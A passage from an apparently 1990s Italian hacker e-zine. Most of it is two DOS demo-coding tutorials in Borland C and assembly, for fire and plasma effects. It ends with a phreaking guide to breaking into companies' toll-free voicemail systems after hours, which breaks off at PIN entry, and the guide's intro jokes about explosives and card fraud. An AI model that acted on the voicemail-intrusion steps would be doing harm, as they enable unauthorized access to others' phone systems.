         outportb(0x3c8,ncol);  // porta 0x3c8 numero colore [0..255] 
         outportb(0x3c9,r);     // porta 0x3c9 valore rosso  [0..63]
         outportb(0x3c9,g);     // porta 0x3c9 valore verde  [0..63]
         outportb(0x3c9,b);     // porta 0x3c9 valore blu    [0..63]
     }

     info funziona anche in modalit testo, provate a mettere
     set_color(7,0,63,0);
e avrete al posto del grigio r=42 g=42 b=42 un bel verde come nel film matrix
se poi fate anche

 set_dimensione(int dim){ // 1..4 (prova con il  2 )

funziona in modalit testo
                           asm{ mov ax,0x1110
                                add ax,dim
                                mov bl,0
                                int 10h
                                       }
     }

L'effetto  ancora + bello (non vi piacciono le scritte cos? )

Finita la breve info ecco i colori che deve avere un fuoco

Il fuoco partendo dall'alto va:  dal nero al rosso al giallo al bianco,
il rosso  il colore dominante percui dovremmo mettere pi sfumature di rosso.

Ci creiamo una bella palette che dal [nero r=0 g=0 b=0] arrivi al
[rosso r=63 g=0 b=0] poi dal rosso al [giallo r=63 g=63 b=0] e infine dal
giallo al [bianco r=63 g=63 b=63]

ecco il codice:

imposta_palette(){
                         //provate a cambiare i valori
              int i;     //il solito indice
                      //128 sfumature dal nero al rosso -> colore predominante
for (i=0; i<128;i++)
set_color(i,i/2,0,0);
                         //64 sfumature dal rosso al giallo
for (i=128; i<192;i++)
set_color(i,63,i-128,0);
                         //64 sfumature dal giallo al bianco
for (i=192; i<=255;i++)
set_color(i,63,63,i-192);
                         }

2 come fare il fuoco?
   mah,  semplice si prende un p di benzina e ....
   A parte gli scherzi bisogna creare una matrice (N+2)xM elemnti dove
   metteremo dei valori random compresi tra [0..255] poi operiamo dei calcoli
   su questa matrice cio facciamo una semplice media e ...( difficile da
   spiegare a parole, guardate il codice)

       void imposta_fuoco(){ //inizializza il fuoco
                    int x,y; //i nostro bei indici
      for (y=0; y<N+2; y++)  //(N+2) * M (perch N+2 -> si capisce dopo)
 for (x=0; x<M; x++)
 fuoco[y][x] = rand() % 256; //valori random [0..255]
    }

      void vai_fuoco(){  //il cuore dell'effetto
      int x,y;
   for (x=0; x<M; x++)   // M nel nostro caso vale 320
   for (y=0; y<N; y++){  // arrivo massimo a N-1 , N + 2 = 202 la matrice 
                            M*(N+2)

                         // stiamo testando la colonna 0
if (x == 0)
                         //calcolo una media con i colori
                           (lo shift di 2 = dividere per 4, provare per
                           credere
         fuoco[y][x] = (fuoco[y+1][0] + fuoco[y+1][x] +
         fuoco[y+1][x+1] + fuoco[y+2][x])>>2;

else
                         // stiamo testando la colonna M-1 (319)
       if (x == M-1)
         fuoco[y][x] = (fuoco[y+1][x-1] + fuoco[y+1][x] +
         fuoco[y+1][M-1] + fuoco[y+2][x])>>2;
else
                         // siamo nel mezzo
         fuoco[y][x] = (fuoco[y+1][x-1] + fuoco[y+1][x] +
         fuoco[y+1][x+1] + fuoco[y+2][x])>>2;

                         //serve per sfumare alla fine il fuoco verso il nero
                         //provate a commentare la riga o a cambiare le
                           costanti che metteremo nel main
if (fuoco[y][x] > max_altezza_fuoco) fuoco[y][x] -= altezza_fuoco;
     }
    }

Il codice credo che si commenti da solo, abbiamo questa matrice e facciamo una
bella media globale cos da sfumare proggressivamente il nostro bel fuoco.

Un suggerimento:

Provate a fare la media con dei punti diversi dipo (x-1,y-1) (x+1,y-1)
(x-1,y+1) (x+1,y+1)

Se pensavate che fosse finita vi siete sbagliati ora bisogna disegnare questo
bel fuoco a video e successivamente annimarlo. Per disegnarlo  facilissimo
ecco qua il codice:

 void disegna_fuoco (void){
      int x, y;
                               // Copiamo il contenuto della matrice a video
         for (y=0; y<N; y++)   //M = 320 e N=200 potete anche variare
         for (x=0; x<M; x++)   //e magari mettere anche un bel start_x e
                                 start_y
put_pixel (x, y, fuoco[y][x]); //nota non disegno le ultime due righe
                               //provate a sostituirla con int_put_pixel (che
                                 lento no?)
    }

Animiamo il tutto ->

basta rimpostare dei valori random [0..255] nelle ultime 2 righe ecco perch
non le disegnamo (sarebbero un p brutte) e perch abbiamo un matrice con due
righe in pi.
   
 void anima_fuoco(){           //fa muovere il fuoco combinata insieme a vai
                                 fuoco
              int x;           //il solito indice
for (x=0; x<M; x++){           //M=320 e N=200
fuoco[N][x] = rand () % 256;   // 200 ecco perch una matrice di M*(N+2)
fuoco[N+1][x] = rand () % 256; //201
    }
   }


Abbiamo quasi finito ora basta creare il main, lo so che siete pigri percui
eccolo qui di seguito:

  #include<conio.h>  //per il kbhit
  #include<dos.h>    //pel l'MK_FP (make a far pointer)
  #include<stdlib.h> //per il random
  
  //variabili globali e costanti:
  const int N=200;
  const int M=320;
  const int  max_altezza_fuoco=20; //serve per sapere l'altezza massima del
  fuoco
  const char altezza_fuoco=1;      //per sfumare il fuoco verso il nero

  unsigned char fuoco[N+2][M]; //globale 

// funzioni:
// qui inserite tutte le funzioni sopra descritte (set_vga, imposta_palette,
   imposta_fuoco,
// vai_fuoco, disegna_fuoco, anima_fuoco, set_text e wait_retrace (per queste
   2 vedi dopo) )


  void main(){
   set_vga();
   imposta_palette();
   imposta_fuoco();
   do{
     vai_fuoco();
     disegna_fuoco();
     anima_fuoco();
     wait_retrace();   //vedi seguito provate a toglierla
   }while(!kbhit());
   set_text();
 } // FINE.

 l'ultima funzione reimposta la modalit testo eccola qua:
 void set_text(){
    asm mov ax,03h   //imposta modalit testo
    asm int 10h      //notare la somiglianza con set_vga
 }

Se tutto funziona un bel fuoco dovrebbe apparire, pu darsi che noterete un
piccol flicheraggio,  questo  dovuto dal fatto che il monitor impiega un p
di tempo a fare il refresh, per ovviare  questo inconveninte si possono
operere 2 diverse strategie:

-> la prima consiste nel disegnare il fuoco in una zona di memoria diversa
   dalla memoria video e poi ricopiare questa zona di memoria a video
   (tecnica del double buffer)

-> la seconda consiste nell'aspettare che il monitor facci il refresh
   (wait_retrace) e solo dopo  disegnare.
   Introdurr questo secondo metdodo anche perch se no bisognerebbe
   modificare la funzione put_pixel per dirgli di disegnare da un'altra parte
   (fatelo voi casomai)

ecco il codice:

 void wait_retrace(){  //aspetta il refresh del video
  asm{                 //utile in altri semplici demo
   mov dx,3DAh
  }
  l1:
  asm{
   in al,dx
   and al,08h
   jnz l1
  }
  l2:
  asm{
   in al,dx
   and al,08h
   jz  l2
  }
 }

Ora che il fuoco funziona modificatelo scoprite nuove cose, cambiate la
palette insomma usate un  p di fantasia (non vi avevo detto che ci vuole
un'idea originale?).

Note:

Il codice  stato compilato usando il compilatore della borland il c++
versione 3.0 percui forse  c' qualcosa che bisogna aggiustare in caso non
abbiate il suddetto compilatore.

Il codice  stato da me testato stato e funziona, dovrebbe funzionare dal 286
in su se avete ancora un 8086 dovete aggiustarela funzione put_pixel perch
non sono permessi shiftamenti diretti > di 1.

Se il compilatore vi d un errore sulla funzione put_pixel pu darsi che non
abbiate impostato la compilazione per il 286, state attenti quindi.

Note finali:

Mi piacerebbe parlarvi ancora di come fare qualche effetto come il plasma che
 carino o come fare uno sprite editor, come aprire qualche immagine o magari
introdurvi all'utilizzo del compilatore 10.6 C della watcom che permette
l'utilizzo di istruzioni a 32 bit, di opereare in  modalit protetta, cio
consente di utilizzare tutta la memoria disponibile e fare delle belle cosine
(ihihi). (il watcom c  stato utilizzato per produrre molti video giochi)

Se vi ineressa l'argomento io sono reperibile in farmacia, battutaccia.

--> Per commenti, note, proposte o progetti, domande, ecc.
--> chiamatemi:   orka4n@yahoo.it

Saluti:
saluto il mio amico Berga, tutti i miei compagni, away, Valk, chi  riuscito
a leggere tutto sto articolo. ;) ciao a tutti e alla prossima....(sperando
che ci sar)

---Orka4n---
------------------------------------------------------------[ dEmo-cOdInG ]---
===] EFFETTI: IL PLASMA ]=====================================================
-----[ Orka4n ]---------------------------------------------------------------

Ciao a tutti, sono Orka4n e sono ancora qua per parlarvi di un'altro effetto
grafico che si pu fare facilmente con il pc, il plasma. 

Cosa  il plasma? (domanda difficile)
No non  il sangue, nel nostro caso  solo un effetto grafico, che non ha
nulla a cui vedere con il sangueeee.

Descrizione: (tecnica)

Il plasma non  altro che la somma, calcolata per ogni pixel del nostro
monitor, di alcuni seni (matematici e cosa avevate pensato?) di diversa
frequenza e ampiezza ogni calcolo del seno  strettemente dipendente dalle
coordinate (x,y) del pixel.

Per farla breve un generico pixel(x,y) assume un nuovo colore che dipende
dalle sue coordinate e da un opportuna somma di seni.
Se non avete capito un c***o, non preoccupatevi, capirete in seguito.

Materiale:
Di cosa abbiamo bisogno?
Abbiamo bisogno di alcune cose:

 1) le funzioni di base per la grafica (che abbiamo gi sviluppato con il
    fuoco!) set_vga set_tex set_color

 2) una bella palette (RGB per chi non si ricorda) si pu anche usare quella
    del fuoco

 3) calcolare il seno (ci sono gi delle funzioni che lo fanno per noi)

Un p di matematica:

Per chi non  afferrato in matematica, spiegher cosa diavolo  la funzione
seno, che  il cuore del nostro effetto.

Premetto: da qualche parte ho letto, non mi ricordo dove, che i programmatori
(i demo coder in particolare) non temono la matematica, percui dovete
impararla ;)

Il seno  una funzione periodica, cio che si ripete ogni tot (nel nostro caso
ogni 360 gradi) e che ha valore massimo 1 e valore minimo -1.
Il seno graficamente appare come un'onda che va da 0 a 1 ,da 1 a 0 ,da 0 a -1
e da -1 a 0 (poi si ripete) Volevo fare un asci art ma  un p difficile.

Qualcuno di voi si  mai chiesto come diavolo si faccia a calcolare il seno di
un angolo?

Esistono tanti metodi, per esempio le comuni calcolatrici utilizzano un
algoritmo che non  altro che la sommatoria di alcuni termi. Per chi 
afferrato in materia conoscer benissimo la serie di Taylor eheh. Vi propongo
subito l'algoritmo:

seno(x) (x=radianti) cosa sono i radianti?
I radianti sono un altro modo di misurare un'angolo ecco dei semplici
confronti:
________________________________
| Gradi |       Radianti        |
|-------|-----------------------|
| 0    |= 0            radianti|
| 30   |= (pigreco/6)     "    |
| 60   |= (pigreco/3)     "    |
| 90   |= (pigreco/2)     "    |
| 120  |= (2/3 pigreco)   "    |
| 135  |= (3/4 pigreco)   "    | angolo in radianti = ((pigreco)/180)*(angolo
| 150  |= (5/6 pigreco)   "    | in gradi)
| 180  |= (pigreco)       "    |
| ...   |                       | angolo in radianti = (0.017453292)*(angolo 
| 360  |= (2pigreco)      "    | in gradi)
| 360  |= 2*pigrego       "    |
|-------|-----------------------|

il simbolo ^ uguale elevamento a potenza
il simbolo ! uguale fattoriale   0!=1   3!=3*2*1  6!=6*5!=6*5*4*3*2*1 .....

seno(x) = x  -(x^3)/3! +(x^5)/5! -(x^7)/7! +(x^9)/9! ......

o in c

  seno[x]=x;
  segno=-1;
  fattoriale=1;
  potenza=x*x*x;
  // parto gi dal 3, ma perch? A voi la risposta ;)
  for(i=3; i<n; i+=2){
    fattoriale = fattoriale*i*(i-1);  
    seno[x] = seno[x] + ( segno * potenza / fattoriale );
    potenza = potenza*x*x;  //da x^3 x^5 ... a x^n
    segno = -segno; // cambio il segno ogni volta -1 +1 -1 +1 ....
  }

Giusto per finire in bello stile ecco qu anche il coseno
Il coseno non  altro che il seno traslato di 90 (gradi) verso sinistra
percui quanndo x=0 il coseno vale 1 (ricordo che il seno per x=0 valeva 0 e
che assume 1 quando x = 90 o pigreco/2 radianti).

coseno(x) = 1 +(x^2)/2! -(x^4)/4! +(x^6)/6! -(x^8)/8!
La funzione in c ve la risaprmio.

Ma perch tutta questa fatica, se essite gi la funzione che calcola il seno
e coseno in genere presenti nella libreria math.h ?

La risposta  semplice, perch cos avete capito come diavolo fanno i
processori, le calcolatrici a calcolare(che gioco di parole) sta benedetta
funzione che  cos tanto importante.
Magari se vi capita fra le mani un vecchio processore (non uno di quelli che
hanno gi l'istruzione per calcolare seno e compagnia bella) potete
sbizzarirvi e fare qualcosa.

Dicevo che il seno  importante (anche quello delle ragazze :P) infatti ha
moltissimi utilizzi, che spaziano tutti i campi. Nel nostro caso, per esempio
nella grafica 3d, serve, assieme al coseno, a far rutotare gli oggetti....

Ma ora,finita, questa breve e fastidiosa lezione di matematica(sperando che
qualcuno abbia capito) passiamo alle cose + divertenti.


Iniziamo:
Comiciamo con la parte pi interessante, il pseudocodice con un misto di c
del plasma

risoluzione 320x200

for(x=0; x<320; x++){
     calcolo i valori rispetto all'ascisse e li salvo 
     valorexx[x] =  20   * seno(x*4) + 30 * seno(x) + 50 * seno(x*2) ;
                   \---/       \---/
                     |           |
                  ampiezza  frequenza
            ho messo dei valori indicativi, a caso 
      presumendo che si possa calcolare il seno di un angolo > di 360 tipo 569
}
for(y=0; y<200; y++){
  calcolo il valore rispetto a una ordinata (y)
  valorey =  30 * seno(y*8) + 50 * seno(y*2) + 20 * seno(y/2) ; 

  for(x=0; x<320; x++){

     faccio un bella media cos ogni pixel dipende strettamente dalle sue
     coordinate...
     valorex = valorexx[x];
     colore = (valorex + valorey) / 2;

     disegno a video il nuovo colore
     disegna(x,y,colore);
  }
}

il plasma in effetti  tutto qua, per (lo sapevate che c'er un per) bisogna
aggiustare un p di cose:

1) il plasma resta fermo, non si muove
2) vogliamo la codifica in c ;)
3)  troppo lento !!!!

-1-
Per animare sto maledetto plasma abbiamo bisogno di una variabile che mi
facci cambiare il calcolo del seno. Niente di pi facile mettiamo un bel
intero che si incrementa fino ad andare in overflow per poi ricominciare dal
valore negativo pi piccolo e cos via. Il plasma cos facendo si muover ma
la sua animazione sar ciclica, dall'altronde cosa vi aspettavate visto che
utiliziamo la funzione seno e che l'intero cicla anche lui?

ecco come si modifica il pseudoCcodice (bello sto termine)

inc=0; //ecco qua il nostro intero che fa muovere il plasma
do{

for(x=0; x<320; x++){
     calcolo i valori rispetto alle ascisse (x) e li salvo
     valorexx[x] =  20   * seno(x*4 + inc) + 30 * seno(x + inc*4)
                                           + 50 * seno(x*2 + inc/4) ;
}

 for(y=0; y<200; y++){

   calcolo il valore rispetto a una ordinata (y)
   valorey =  30 * seno(y*8 + inc) + 50 * seno(y*2 + inc/2)
                                   + 20 * seno(y/2 + inc*8) ;

   for(x=0; x<320; x++){
     faccio una bella media cos che ogni pixel dipende dal valore calcolato
     rispetto alla sua x e y e poi disegno
     valorex = valorexx[x];
     colore = (valorex + valorey) / 2;
     disegna(x,y,colore);
   }
 }
 inc++;  //incremento l'intero

}while(1); //cicla all'infinito o fino quando non bloccate il processo



-2-
-3-
 I seguenti punti gli svilupperemo in ordine inverso, perch non ho voglia di
 scrivere 2 volte il codice del plasma, uno in versione slow e uno in versione
 meno slow.

 Ma cominciamo allora con il -3-
 Come si fa a farlo andare + veloce?

 Ragioniamo:
I calcoli portano via tempo alla cpu percui  buona cosa fare all'inizio tutti
quei calcoli ripetitivi e dispendiosi per la cpu. Nel nostro caso ci sono
parecchi calcoli che vengono fatti + volte, anzi un sacco di volte e che
potrebbero essere svolti all'inizio, prendendoci cura di memorizzare i
risultati da qualche parte.

Siete riusciti a capire di cosa parlo? il seno vi dice qualcosa?
Ebbene s, possiamo calcolare tutti i valori del seno e metterli in un bel
arrey.

Questa tecnica  conosciuta con il nome lookup table, letteralmente guarda
nella tabella di sopra. Alle elementari non avete mai costruito le tavole
pitagoriche (tabelline)?
S, allora avete gi utilizzato questa tecnica ;)

Ci sono altri calcoli che rallentano?
La risposta  si, e sono tutti i calcoli con operandi in virgola mobile.
Per chiarire l'idea vi dico solo che un processore impiega + tempo per fare
qualsiasi operazione matematica con operandi "reali" ed  pi veloce se si
utilizzano numeri interi. Questo perch  pi difficile rappresentare un
numero "reale" in binario, di conseguenza risultano pi dispendiosi tutti
quei calcoli basati sui numeri "reali".

La funzione seno restituisce un valore "reale" compreso tra -1 e 1, percui
bisogner fare in modo che il risultato (restituito dal seno) non sia pi un
numero "reale" (double) ma un semplice intero.

Per fare ci moltiplichiamo il valore ("reale") ottenuto per un valore tippo
1000 o + grande, ma ecco un esempio:

 3,141592 * 1000 = 3141,592

Succesivamente prendiamo solo la parte intera (3141) e la salviamo.

Moltiplicare per 1000 equivale a spostare la virgola di 3 posizioni verso
destra, percui noi sappiamo che 3141 corrisponde a 3,141.

In questo modo si perde un p di precisione, ma nel nostro caso non ce ne
serve + di tanta.

(Comunque si poteva moltiplicare per 1000000(maggior precisione) ma questo va
 valutato di caso in caso).

Questa tecnica viene chiamata fixed point (punto fisso) (che non centra con
l'uncinetto).

Ma ecco come lo faremo noi:

Trasformiamo tutti i valori del seno in fixed point moltiplicando il risultato
(double) ottenuto per 1024 (1024?) si perch qui c' un'altro trucco sempre
per fare andare le cose + veloci.

1024 = 2^10 e con ci . Sapete tutti cosa significa shiftare un numero 
                        binario?

Ecco una serie di esempi:

    n = 00110 binario = 6 decimale  se sposto tutti i bit a sinistra di 1
                        ottengo
    n<<1 = 01100 binari = 12 decimale equivale a moltiplicare n per 2
                          se invece shifto tutti i bit a destra di 1
    n>>1 = 00011 = 3 equivale a dividere(divisione intera) n per 2
                   poich la moltiplicazione e la divisione richiedono +
                   tempo per essere eseguite... ecco svelato il mistero del
                   1024
    n<<10 = n*1024  e  n>>10= n/1024

I trucchi non sono finiti qua, infatti se noi memorizziamo i valori del seno
in un arrey di 360 elementi (elemento 0 = seno 0 elemnto 90 = seno 90 gradi),
significa che se vogliamo calcolare un angolo tipo 420 dobbiamo fare :

 if(angolo>360) angolo=angolo%360; //% simbolo di resto operazione lenta
 ricordo che il seno  ciclico e che seno(420) corrisponde a
 seno(420-360)=seno(80) (gradi)

Come facciamo a ovviare a questo piccolo problema che se aggiustato farebbe
andare il nostro plasma un p pi veloce?

 1) lasciamo cos tanto ...
 2) Usiamo un p di zucca

Qui entra in gioco l'astuzia e ancora una volta la ciclicit.
Ma ecco un'esempio che vi fa subito capire senza tante spiegazioni pallose.

Abbiamo una variabile unsigned char val (8 bit 0..255 i valori possibili)
assegniamo a val 23, tutto va bene
assegniamo a val 256 , troppo grande, ma non d errore
vediamo cosa c' in val e troviamo 0
proviamo a mettere in val 320 , troppo grande 
vediamo cosa c' in val  e troviamo 320-256=64 . Bingo e ciclica come il seno

infatti seno (400) = seno (400-360) = seno(40)

percui non dobbiamo fare quell'inutile confronto!

Per mi direte in un unsigned char abbiamo massimo 256 valori diversi e non
360 come il seno?

E allora noi usiamo un p di astuzia e facciamo in modo di avere solo 256
angoli diversi che coprino il range da 0 a 360 gradi. Si usa a tale scopo una
proporzione:

360 elementi / 256 = 1.40625
cio gli angoli da noi calcolati (256) saranno 0, 1.40625, 2.8125, 4,21875
...cio tutti i multipli di 1.40625  da 0 a 360.
 
Un'ultima ottimazzione riguarda il disegno del pixel a video. Se si nota, si
disegna per righe, cio dall'angolo alto sinistro all'angolo basso destro del
monitor (si procede linearmente lungo la memoria). Percui si potrebbe 
sfruttare questo fatto per velocizzare il disegno del pixel. In pratica 
elimineremo tutti quei calcoli di conversione che servono per trasformare 
una coordinata (x,y) ad un puntatore in memoria.

Le ottimizazzioni sono pressoche terminate, abbaimo un livello di velocit
accettabile, se proprio volete avere il massimo e volete sfruttare la vostra
macchina fino all'osso allora vi consiglio di utilizzare direttamente
l'assembly.

 -2- Il codice 

Siamo arrivati alla parte pi divvertente il codice e allora iniziamo subito.

(compilatore utilizzato turbo c++ 3.0 (Borland), percui se si utilizzano altri
 compilatori forse bisogna aggiustare qualcosa.)

#include<conio.h>  //-> kbhit e getch (si possono fare in assembly) 
#include<math.h>   //-> per il seno ;) (sappiamo come calcolarlo anche da 
                        soli)
#inclue<dos.h>     //-> per l'outportb e inportb (si possono fare in assembly)

void set_vga() {
    asm mov ax,13h   //imposta modalit 320(x) x 200(y) (256 colori)
    asm int 10h      //questo  inline assembly permesso dal c
}

void set_text(){
    asm mov ax,03h   //imposta modalit testo
    asm int 10h      //nota la somiglianza con set_vga
}

//converte un angolo da gradi in radianti
double Rad(double ang){ // ang 0..360
 return (ang*0.017453292);
}

//fa il negativo di una palette un effetto carino
//l'ho voluto mettere cos perch mi andava, non  neccessario
void negative(void){
  int col;
  unsigned char r,g,b;
  for(col=0;col<256;col++){
   outportb(0x3c7,(unsigned char)col);
   r = inportb(0x3c9); //leggo il valore r di col
   g = inportb(0x3c9); //leggo il valore g di col
   b = inportb(0x3c9); //leggo il valore b di col
   set_color((unsigned char)col,63-r,63-g,63-b); //trasformo il colore in
   negativo...
   col++;
 }
}

//fa una palette carina, modifiacate a vostro piacimento
void imposta_palette(){

      int i,j; //i soliti indici

      //33 colori 17+16   0 a 16 17 a 32
      for(i=0;i<=16;i++)   //17 col
     set_color(i,63,i*2,0);

     for(i=17;i<=32;i++) //16 col
      set_color(i,63,i*2-1,0);

      //63 colori
      j=62;          //33 a 95 =63 colori da 62 a 0
      for(i=33;i<96;i++)
      set_color(i,j--,63,0);

      j=1;
      for(i=96;i<160;i++){
       set_color(i,0,63-j,j);
         j++;
      }
      set_color(159,0,0,63);

      j=1;
      for(i=160;i<255;i++){
       set_color(i,j,0,63-j);
      if(i%2!=0)j++;
      }
      set_color(255,63,0,0);

}

void main(){

//Variabili:
int valorexx[320];
int seno[256];
int x,y;    //contatori
int valorex,valorey,inc,pos,colore;
unsigned char primo,secondo,terzo,car;


    //creiamo la look up table del seno   360/256=1.40625
    for(x=0;x<256;x++){
      seno[x]=int(sin( Rad((double)x * 1.40625) ) * 1024);
    }
    //impostiamo modalit grafica 320x200
    set_vga();
    imposta_palette(); //carichaimo una bella palette da noi fatta
                       //pi bella  la palette e pi carino sar l'effetto
    inc = 0;
    car = 0; //tasto premuto, leggi carattere...

    while(car != 27){ //27 corrisponde al tasto ESC
     //incremanto la variabile inc
     pos = 0;   //posizione all'interno della memoria video da 0 a 320x200
     inc++;
     for(x=0;x<320;x++){
           //uso gli sciftamenti invece delle moltiplicazioni e divisioni
              primo   = (unsigned char) ( (x << 1 ) + (inc     ) );
              secondo = (unsigned char) ( (x      ) + (inc << 2) );
              terzo   = (unsigned char) ( (x >> 1 ) + (inc >> 2) );
     valorexx[x] =   20 * seno[primo]+
			   30 * seno[secondo]+
			   50 * seno[terzo];
     }
     for(y=0;y<200;y++){
              primo   = (unsigned char) ( (y >> 2) + (inc     ) );
              secondo = (unsigned char) ( (y     ) + (inc << 1) );
              terzo   = (unsigned char) ( (y     ) + (inc >> 1) );
     valorey = 40 * seno[primo]+
		  40 * seno[secondo]+
		  20 * seno[terzo];

         for(x=0;x<320;x++){
        valorex = valorexx[x];
                                   //calcolo la media 
           //la divido per 256 e non per 1024 provate a cambiare
       colore  = (valorex + valorey) >> 8;
          //disegno il pixel a video, molto pi veloce di put_pixel!!!!
          asm{
      mov ax,0xa000
      mov es,ax
      mov di,pos
      mov ax,colore
      mov es:[di],al
                      }
      pos++

                      }
     }//chiudo for y...

     //se si preme un tasto guardo cosa 
     if(kbhit()) car = getch();
     //se il tasto  n faccio il negativo
     if(car == 'n'){negative();car=0;}

   }//chiudo while

   //torno in modalit testo
   set_text();

}//Fine.


Abbiamo finito.
Ora un p di consigli:
Provate a modificare di vostra mano il codice, variate le ampiezze e le
frequenze dei vari seni che calcoliamo, vi aiuter meglio a capire come
diavolo funziona questo effetto.

Usate un p di creativir, provate a fare un plasma interlacciato(un pixel si
e uno no), mettete insieme due plasma, fate ruotare la palette o cambiatela
pi volte nel corso dell'esecuzione. Insomma rendete l'effetto pi carino e
se fate qualcosa di bello fatemi sapere.

Se avete una ragazza fateli vedere cosa avete fatto, sicuramente vi dir
qualcosa del tipo, ma l'hai fatto tu ?,  bellissimo!!! .....

Conclusioni: Spero di non avervi annoiato e se avete domande, proposte,
progetti ecc la mia e-mail  orka4n@yahoo.it
P.s.: Io ed un mio amico, che saluto ciao jaber, stiamo creando un sito sui
      demo e sui videogiochi, da noi prodotti (uno per il momento e non
      ancora ultimato). Se volete contribuire o solo volete curiosare, il
      sito  --> entropia98.cjb.net
(il sito  ancora in fase di costruzione speriamo di finirlo per met di
 luglio ;) )

Buone vacanze a tutti!!!!!!

---Orka4n---

--------------------------------------------------------------[ pHreAkinG ]---
===] INFIMA GUIDA ALLO SVERGINAMENTO SELVAGGIO DELLE [========================
====] SEGRETERIE TELEFONIKE                           [=======================
-----[ mR_bIs0n ]-------------------------------------------------------------


keeeee?

Autore: mR_bIs0n
Consumo: merendine e panini farciti alla nutella...
Musika askoltata: vari mp3 direttamente dal mio MPMan... uahhhh 180 karte!!!

Saluti a: Panino, Luigi, Biby, Carmine, Meriak, Mr_Skull, Piccinni, Pr0digY, e
          tutti quelli della mailing di Spaghetti Phreakers...

Dedicato a: Daniela ke si  trovato uno scemo di ragazzo di 1 ke le fa le
            corna... Ilaria ke si  trovato uno scemo di 3 ke le fa le corna
            (1aggiornamento: SI E'LASCIATAAAAAAAAAAAAAAA KOME GODOOOOOOOOO)
            (2aggiornamento: si  messa con uno stronzo di 1... bene...
            tutte quelle giornate passate a costruire esplosivi serviranno
            finalmente a qualkosa)...
            alle altre tre Ilarie (una di Roma, una amika della sorella di
            Skull e una amika di una mia amika di skuola...)

Fankulo a: tutti i falsi hackers e phreakers, prof.essa di Latino e infine a
           quelli di CalcioMania ke non accettato il mio ordine con carta di
           credito di soli 7 milioni... uffa ci tenevo ai completi
           Casa/Trasferta/Coppa della Lazio... cmq...

 **********
* So'Mario * (cio "sono Mario")
 **********
* (1)Intro                       *
* (2)Dove reperire le segreterie *
* (3)Le segreteire               *
* (4)Come agire                  *
* (5)Una volta indiviuata        *
* (6)Cosa ne faccio???           *
* (7)I riski                     *
* (8)Ne potevi fare a meno???    *
* Una nota preziosa sull'autore  *

 - 01 - Intro
Bene bene... ci risentiamo dopo tanto tempo... ma sapete...  stata dura
trovare un'altra rivista ke mi ospitasse... vabb bando alle ciance (mamma
mia ke fastidio ke mi da'questa frase...) ho voluto scrivere quest'artikolo
per fare un po'di luce sulle segreterie telefonike su numero verde... spero vi
sia utile...

 - 02 - Dove reperire le segreterie
Una kosa molto importante  quella di trovare del materiale utile per
reperire numeri verdi e di conseguenza segreterie telefonike... allora vi
potrebbero servire:
 - giornali del tipo: "Famiglia Puttana"... cio "Famiglia Cristiana"...
   "Grazia"...
 - giornalacci porno direte voi, vero? ne dubito... comunque visto ke ci
   tenete vi lascio dei titoli... "Super Joint", "Selen, Puledra in calore",
   "Grande e Calda"...
 - le Pagine Gialle della Seat... possiamo trovare tanti bei numeretti di
   ditte e aziende...
 - le Pagine Utili della Mondadori... anke l  possibile trovare numeri
   utili...
 - l'elenko telefoniko  cos vasto di numeri ke diventa difficile trovare
   ci ke ci serve... cmq...
Una volta ke avete un po'di roba potete iniziare a fare le prove per trovare
il numero con la segreteria da sverginare... ma prima...

 - 03 - Le segreterie
Esistono vari tipi di segreterie... possiamo dividerle in segreterie a mono
casella (es. le segreterie Memotel) e a multi casella(es. Meridian della
Northen Telekom)... bene vediamo le caratteristike...
le segreterie a mono casella vocale sono delle segreterie molto meno evolute
ma pi semplici da usare... infatti con le segreterie tipo Memotel c' un
solo "padrone" della segreteria perk esiste appunto una sola casella da
governare... ci vuol dire ke potete settare il messaggio di benvenuto e
quando kiameranno il numero, ki vi kiamer, ascolter subito la vostra voce
registrata...
le segreterie a multi casella, invece, sono delle segreterie con pi di una
casella vocale... ci vuol dire ke si possono avere pi "padroni" perk ci
sono pi caselle da governare... cosikk si possono creare comunit di pi
utenti ke si skambiano messaggi... queste segreterie sono pi avanzate... e
quindi pi complicate... a volte sono piene zeppe di men vocali ke nemmeno io
riesko a rikordare... a volte bisogna scriverseli... molto spesso kueste
segreterie sono utili anke per fare kiamate gratuite... ma andiamo avanti...

 - 04 - Come agire
Bene... una volta kiamato un numero verde bisogna fare delle prove... ora vi
spiego...
per prima kosa kiamate esklusivamente in orari non di ufficio, e cio, dopo
le 18.30... a volte anke alle 19.00... io veramente lo faccio dopo le 21.00
perk coincide proprio coll'orario ke sto seduto al cesso col cell di mia
madre... HEHEHEH....
allora, una volta composto il numero aspettate fino a quando non sentirete
voci o segnali... se dopo un po'di squilli non risponde niente o se invece
sentirete la vocina da castrato della telekozz ke dice: "Kakkio!
Avete kiamato in orario..." (Veramente kakkio non lo dice...), lasciate
perdere perk sikuramente il numero  stakkato per motivi di soldi!!!
Se kiamate da cell e dice ke la kiamata proviene da un'area non abilitata,
lasciate perdere e provate da kabina...
se ankora, quando kiamate vi dikono: "... vi sar passato un operatore..."
oppure sentite direttamente: "Pronto sono Asdrubale, come posso aiutarla..."
attakkate immediatamente perk i pezzenti ke avete kiamato non vanno mai a
dormire... ke koglioni...
quando finalmente prendete la linea, nella maggiorparte dei casi sentire una
voce ke avverte ke avete kiamato in orario non di ufficio...
ora bisogna accertarsi se esiste una segreteria, anke se non  attivata...
quindi per prima kosa aspettate e sentite per intero il messaggio... una
volta finito se stakka immediatamente, rikiamate... se invece vi si presenta
un men ankora meglio... se invece vi dikono di lasciare un messaggio in
segreteria potrete esultare a piacimento e, volendo, farvi dei pompini da soli
anke se risulterebbe molto difficile...
oki andiamo per ordine: tentate di avvicinare il vostro capo alla zona
pubica... ehm... skusate...
oki andiamo per ordine: se vi riattakka, rikiamate e premete per prima kosa
cancelletto o diesis (#)... ascoltate kosa dice... se non dice niente allora
provate con asterisko (*)... ascoltate kosa dice... se neanke kuello fa
niente allora premete a kazzo tutti i tasti della tastiera... E KE KAKKIO!!!
bene, se al premere del cancelletto sentite qualkosa di nuovo tipo: "Inserire
il codice di identificazione..." oppure "Inserire il numero di casella
vocale..." siete a kavallo e potete anke tentare, senza esiti konkreti, di
suonare una melodia con vari scorreggi uscenti dal vostro ano...
se vi si presenta un men siete forse gi entrati nella segreteria... ma
bisogna aspettare e ascoltare tutto ci ke dice...
se vi dice di lasciare un messaggio, dite kualkosa di infinitamente stupido e
premete cencelletto... forse dopo potrete entrare nella segreteria...
Tutto potrebbe sembrare un po'confusionario, ma rikordate ke sar tutto pi
semplice provando pratikamente...

 - 05 - Una volta individuata
Allora se vi trovate ke dovete immettere un kodice, tipo un PIN, nella
